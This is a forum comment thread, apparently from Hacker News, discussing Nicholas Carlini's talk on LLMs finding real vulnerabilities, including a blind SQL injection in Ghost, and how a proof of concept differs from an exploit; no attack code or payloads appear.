A hard read for a skeptic like me. A lot of speculation and extrapolation of a t...

acdha · 2026-03-31T00:10:51 1774915851

I tend to be skeptical but listening to the linked podcast with Carlini and found him very credible–not a sales guy, not an AI doomer, but someone talking about how little work he had to do to find real exploits in heavily-fuzzed code. I think there’s still a safe bet that many apps will be cumbersome to attack but I think it’s still going to happen faster than I used to think.

https://securitycryptographywhatever.com/2026/03/25/ai-bug-f...

tptacek · 2026-03-31T00:19:40 1774916380

Nicholas Carlini is the real deal. He was most recently on the front page for "How to win a best paper award", about his experience winning a series of awards at Big 4 academic security conferences, mostly recently for work he coauthored with Adi Shamir (I'm just namedropping the obvious name) on stealing the weights from deep neural networks. Before all that (and before he got his doctorate), he and Hans Nielsen wrote the back half of Microcorruption.

He's not a sales guy.

acdha · 2026-03-31T02:38:33 1774924713

Thanks for having him on. It was really nice to hear a sober, experienced voice talking about their work with fellow practitioners.

tptacek · 2026-03-31T03:48:12 1774928892

Thank Nicholas! We'll talk to anyone. :)

m132 · 2026-03-31T01:05:25 1774919125

Thanks. Watched most of this talk and, unless I missed something, it seems to confirm what I was thinking—most of the strength currently comes from the scale you can deploy LLMs at, not them being better at vulnerability research than humans (if you factor out the throughput). And since this is a relatively new development, nobody really knows right now if this is going to have a greater impact than fuzzers and static analyzers had, or if newer models are ever going to get to a level that'd make computer security a solved problem.

woeirua · 2026-03-31T00:24:42 1774916682

Theres a video of a recent talk Nicolas Carlini gave this past week on Youtube. It’s eye opening. If you don’t believe that LLMs are going to transform the cybersecurity space after watching that I can’t help you.

tptacek · 2026-03-31T00:30:45 1774917045

It's this talk right here:

https://www.youtube.com/watch?v=1sd26pWhfmg

7 minutes in, he shows the SQLI he found in Ghost (the first sev:hi in the history of the project). If I'd remembered better, I would have mentioned in the post:

* it's a blind SQL injection

* Claude Code wrote an exploit for it. Not a POC. An exploit.

streetfighter64 · 2026-03-31T09:03:54 1774947834

> Not a POC. An exploit.

What's the distinction? A proof of concept is just something that demonstrates that a bug is possible to exploit, by doing so.

cushychicken · 2026-03-31T13:44:52 1774964692

Repeatability and/or an actual negative effect.

POC generally means “you can demonstrate unintentional behavior”.

“Exploit” means you can gain access or do something malicious.

It’s a fine line. Author’s point is that the LLM was able to demonstrate some malfeasance, not just unintended consequence. That’s a big deal considering that actual malicious intent generally requires more knowhow than raw POC.

tptacek · 2026-03-31T17:37:25 1774978645

Specifically: the exploit extracted the admin's credentials from the database. A blind SQLI POC would simply demonstrate the existence of a timing channel based on a pathological input.

cushychicken · 2026-03-31T21:01:19 1774990879

One other commenter asked a decent question - does going lighter (Zig) or harder on memory safety (Rust) confer any meaningful advantages against the phenomenon you describe?